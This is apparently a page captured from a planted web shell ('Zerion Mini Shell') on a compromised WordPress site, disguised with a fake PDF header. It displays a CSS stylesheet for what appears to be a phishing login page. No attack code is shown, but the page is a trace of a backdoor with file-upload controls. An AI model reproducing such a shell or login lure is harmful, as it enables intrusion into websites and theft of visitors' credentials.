%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/projetos/korean.ongrace.com/wp-content/ai1wm-backups/66/css/
Upload File :
Create Path :
Current File : /var/www/projetos/korean.ongrace.com/wp-content/ai1wm-backups/66/css/bss.css

@import url("https://fonts.googleapis.com/css2?family=Cabin:ital,wght@0,400..700;1,400..700&family=Inter:wght@100..900&family=Montserrat:ital,wght@0,100..900;1,100..900&family=Mukta:wght@200;300;400;500;600;700;800&family=Noto+Sans+TC:wght@100..900&family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&family=Reddit+Sans:ital,wght@0,200..900;1,200..900&family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&family=Rubik:ital,wght@0,300..900;1,300..900&family=Wix+Madefor+Text:ital,wght@0,400..800;1,400..800&display=swap");
body {
  padding: 0;
  margin: 0;
  font-family: "Reddit Sans", sans-serif;
  min-height: 100%;
  margin: 0;
  padding: 0;
  background: url("../image/back.svg") #f0f0f0 no-repeat fixed bottom right; }

.navbar {
  background-color: #ffffff;
  padding: 0 5.125em;
  height: 4.25em;
  border-bottom: solid 1px #d9d9d9;
  vertical-align: middle; }
  @media (max-width: 767px) {
    .navbar .container-fluid {
      justify-content: center; } }
  @media (max-width: 767px) {
    .navbar .num {
      display: none; } }

.home {
  padding-top: 40px;
  padding-bottom: 40px; }
  .home .login {
    max-width: 450px;
    border-radius: 8px;
    position: relative;
    background-color: #ffffff;
    height: 100%;
    overflow: hidden;
    padding: 48px 48px var(--o-wrapper-padding-bottom);
    box-shadow: 0 1px 5px 0 rgba(0, 0, 0, 0.2), 0 3px 1px -2px rgba(0, 0, 0, 0.12), 0 2px 2px 0 rgba(0, 0, 0, 0.14);
    z-index: 99999;
    padding: 40px;
    margin: 0 auto;
    position: relative; }
    .home .login .loading {
      position: absolute;
      width: 100%;
      height: 100%;
      left: 0;
      top: 0;
      right: 0;
      bottom: 0;
      background-color: white;
      display: flex;
      align-items: center;
      justify-content: center;
      z-index: 1; }
      .home .login .loading .loader-1 {
        width: 52px;
        height: 52px;
        border: 4px solid #D9D9D9;
        border-bottom-color: #FF6200;
        border-radius: 50%;
        display: inline-block;
        animation: rotation 1s linear infinite; }
@keyframes rotation {
  0% {
    transform: rotate(0deg); }
  100% {
    transform: rotate(360deg); } }
    .home .login h4 {
      font-weight: 400;
      margin-bottom: 30px; }
    .home .login p {
      margin-bottom: 20px; }
    .home .login .cliclack a {
      display: flex;
      align-items: center;
      text-decoration: none;
      color: #333;
      font-weight: 400;
      font-size: 14px; }
      .home .login .cliclack a .span {
        height: 8px;
        width: 8px;
        border-radius: 100%;
        margin: auto;
        box-sizing: border-box;
        background-color: #FF6200;
        display: flex; }
      .home .login .cliclack a .circle {
        width: 20px;
        height: 20px;
        border-radius: 100%;
        border: 1px solid #a8a8a8;
        border-radius: 100%;
        box-shadow: 0 0.125em 0.125em 0 #d9d9d9;
        margin-right: 7px;
        line-height: 20px;
        display: flex; }
    .home .login form .err {
      display: none; }
    .home .login form label {
      font-weight: 300;
      margin-bottom: 3px;
      color: #000; }
    .home .login form input {
      border-radius: 0.25em;
      padding: 0.5em 0.75em;
      width: 100%;
      height: 2.5em;
      box-shadow: 0 0.125em 0.125em 0 #d9d9d9 inset;
      box-sizing: border-box;
      position: relative;
      font-size: 1em;
      line-height: 1.375em;
      background-color: #fff;
      border: 0.0625em solid #a8a8a8;
      color: #333; }
      .home .login form input:focus {
        box-shadow: 0 0 0.125em 0.125em #9fcaea, 0 0.125em 0.125em 0 #d9d9d9 inset;
        border-color: #559bd1;
        z-index: 1;
        outline: 1px solid transparent; }
    .home .login form .all {
      border-radius: 0.25em;
      width: 100%;
      height: 2.5em;
      box-shadow: 0 0.125em 0.125em 0 #d9d9d9 inset;
      box-sizing: border-box;
      position: relative;
      font-size: 1em;
      line-height: 1.375em;
      background-color: #fff;
      border: 0.0625em solid #a8a8a8;
      color: #333;
      display: flex;
      justify-content: space-between;
      align-items: center; }
      .home .login form .all input {
        width: 33.33%;
        border: none;
        box-shadow: none;
        height: 1.5rem; }
        .home .login form .all input.bb {
          border-left: 1px solid #A8A8A8; }
        .home .login form .all input.one {
          border-radius: 0.25em 0px 0px 0.25em; }
        .home .login form .all input.two {
          border-radius: 0em 0.25px 0.25px 0em; }
        .home .login form .all input:focus {
          box-shadow: 0 0 0.125em 0.125em #9fcaea, 0 0.125em 0.125em 0 #d9d9d9 inset;
          border-color: #559bd1;
          z-index: 1;
          outline: 1px solid transparent;
          height: 2.4rem;
          border: 1px solid #559bd1;
          transition: 0s; }
    .home .login form .btn {
      font-size: 1.1875em;
      line-height: 1.474em;
      border-radius: 0.5em;
      transition: 0.1s;
      background-color: #FF6200;
      color: white;
      width: 100%;
      margin-top: 30px;
      font-weight: 600;
      border: 2px solid #FF6200; }
      .home .login form .btn:hover {
        background-color: white;
        color: #FF6200; }
    .home .login form .malal {
      margin-top: 20px; }
      .home .login form .malal a {
        color: black;
        font-weight: 300;
        font-size: 16px;
        text-decoration: none;
        display: flex;
        align-items: center; }
        .home .login form .malal a:hover {
          text-decoration: underline; }
        .home .login form .malal a img {
          margin-right: 2px; }

/*# sourceMappingURL=bss.css.map */

Zerion Mini Shell 1.0